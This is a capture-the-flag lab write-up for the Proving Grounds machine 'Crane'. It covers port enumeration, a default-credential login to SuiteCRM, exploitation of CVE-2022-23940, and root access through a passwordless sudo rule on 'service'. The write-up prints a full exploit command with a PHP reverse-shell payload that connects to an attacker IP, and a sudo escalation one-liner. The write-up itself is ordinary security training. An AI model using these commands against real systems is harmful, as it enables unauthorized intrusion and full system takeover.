Crane

Source: Proving Grounds OS: Linux Community Rating: Easy

Enumeration & Reconnaissance

  • I started with autorecon as usual, which exposed the following ports:

    • SSH (22)

    • HTTP (80)

    • 3306

    • 33060

Service Analysis

  • I began with HTTP (80), which hosted a SuiteCRM site. I tried the default credentials (admin:admin) and, as easy as that, I was in! I browsed around for a bit and then checked for a CVE. I found CVE-2022-23940, which provides RCE. I downloaded the PoC, which required valid credentials, and we already had them.

SuiteCRM

Gaining Initial Access

  • I started a listener and ran the PoC with the following command: python exploit.py -h http://192.168.197.146 -u admin -p admin --payload "php -r '$sock=fsockopen("192.168.45.201", 4444); exec("/bin/sh -i <&3 >&3 2>&3");'"

  • This delivered a reverse shell.

Reverse Shell

Privilege Escalation

  • I then uploaded linpeas, which exposed that I could run /usr/sbin/service as root without a password. Checking gtfobins for a suitable command, I ran: sudo service ../../bin/shand got a root shell.

sudo -l
root Access

Lessons Learned

  • Default credentials can provide immediate access.

  • Simple misconfigurations, such as a service executable running as root without a password, offer a straightforward path to privilege escalation.

Last updated